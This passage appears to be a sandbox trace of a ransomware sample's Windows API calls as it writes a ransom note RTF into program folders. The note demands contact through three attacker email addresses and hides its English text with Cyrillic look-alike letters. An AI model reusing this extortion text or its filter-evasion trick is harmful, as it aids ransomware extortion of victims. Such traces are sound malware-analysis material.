10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e943a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0136.010] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0136.011] CloseHandle (hObject=0x1f0) returned 1 [0136.011] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bg85_info.rtf")) returned 0xffffffff [0136.011] GetLastError () returned 0x2 [0136.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 